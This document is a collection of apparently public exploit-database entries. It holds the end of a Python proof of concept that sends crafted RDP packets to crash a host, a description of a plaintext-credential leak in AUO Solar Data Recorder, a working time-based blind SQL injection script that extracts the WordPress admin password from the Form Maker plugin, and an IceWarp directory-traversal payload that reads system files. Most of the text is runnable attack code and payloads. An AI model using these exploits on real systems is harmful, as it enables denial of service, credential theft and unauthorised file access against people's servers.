main(args): tls = send_init_packets(args[1]) send_client_data(tls) print("[+] ClientData Packet Sent") send_channel_packets(tls) print("[+] ChannelJoin/ErectDomain/AttachUser Sent") send_client_info(tls) print("[+] ClientInfo Packet Sent") tls.recv(8192) tls.recv(8192) send_confirm_active(tls, None) print("[+] ConfirmActive Packet Sent") send_establish_session(tls) print("[+] Session Established") send_kill_packet(tls, args[2]) terminate_connection(tls) print("[+] Vuln Should Trigger") if __name__ == '__main__': if len(sys.argv) != 3: print("Usage: python poc.py 127.0.0.1 64") sys.exit() elif sys.argv[2] == '32' or '64': # I've had to send the packets 5 times for hosts that havent # had a terminal session since their last reboot. I think # I know why but atm its just easier to send the exchange # 5 times and it'll crash eventually. Most of the time its # the first time though. for _ in range(5): main(sys.argv) else: print("Usage: python poc.py 127.0.0.1 64") sys.exit()

# Exploit Title: AUO Solar Data Recorder - Incorrect Access Control # Date: 2019-04-16 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.auo.com/zh-TW # Version: AUO Solar Data Recorder all versions prior to v1.3.0 # Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index # CVE: CVE-2019-11367 # 1. Description: # In AUO Solar Data Recorder web page, it's use HTTP Basic Access Authentication. # Once user access the files which are under path http://<host>/protect/, # the website will response the plaintext account and password in WWW-Authenticate attribute. # Attackers is capable to login AUO Solar Data Recorder successfully. # 2. Proof of Concept: # Access the files which are under path http://<host>/protect/ of AUO Solar Data Recorder. # The website use HTTP Basic Access Authentication, # and response the plaintext account and password in WWW-Authenticate attribute. # By using the account and password in HTTP response, # anyone can login AUO Solar Data Recorder successfully.

# -*- coding: utf-8 -*- # Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection # Date: 22-03-2019 # Exploit Author: Daniele Scanu @ Certimeter Group # Vendor Homepage: https://10web.io/plugins/ # Software Link: https://wordpress.org/plugins/form-maker/ # Version: 1.13.3 # Tested on: Ubuntu 18.04 # CVE : CVE-2019-10866 import requests import time url_vuln = 'http://localhost/wordpress/wp-admin/admin.php?page=submissions_fm&task=display&current_id=2&order_by=group_id&asc_or_desc=' session = requests.Session() dictionary = '@._-$/\\"£%&;§+*1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM' flag = True username = "username" password = "password" temp_password = "" TIME = 0.5 def login(username, password): payload = { 'log': username, 'pwd': password, 'wp-submit': 'Login', 'redirect_to': 'http://localhost/wordpress/wp-admin/', 'testcookie': 1 } session.post('http://localhost/wordpress/wp-login.php', data=payload) def print_string(str): print "\033c" print str def get_admin_pass(): len_pwd = 1 global flag global temp_password while flag: flag = False ch_temp = '' for ch in dictionary: print_string("[*] Password dump: " + temp_password + ch) ch_temp = ch start_time = time.time() r = session.get(url_vuln + ',(case+when+(select+ascii(substring(user_pass,' + str(len_pwd) + ',' + str(len_pwd) + '))+from+wp_users+where+id%3d1)%3d' + str(ord(ch)) + '+then+(select+sleep(' + str(TIME) + ')+from+wp_users+limit+1)+else+2+end)+asc%3b') elapsed_time = time.time() - start_time if elapsed_time >= TIME: flag = True break if flag: temp_password += ch_temp len_pwd += 1 login(username, password) get_admin_pass() print_string("[+] Password found: " + temp_password)

# Exploit Title: IceWarp <=10.4.4 local file include # Date: 02/06/2019 # Exploit Author: JameelNabbo # Website: uitsec.com # Vendor Homepage: http://www.icewarp.com # Software Link: https://www.icewarp.com/downloads/trial/ # Version: 10.4.4 # Tested on: Windows 10 # CVE: CVE-2019-12593 POC: http://example.com/webmail/calendar/minimizer/index.php?style=[LFI] Example: http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini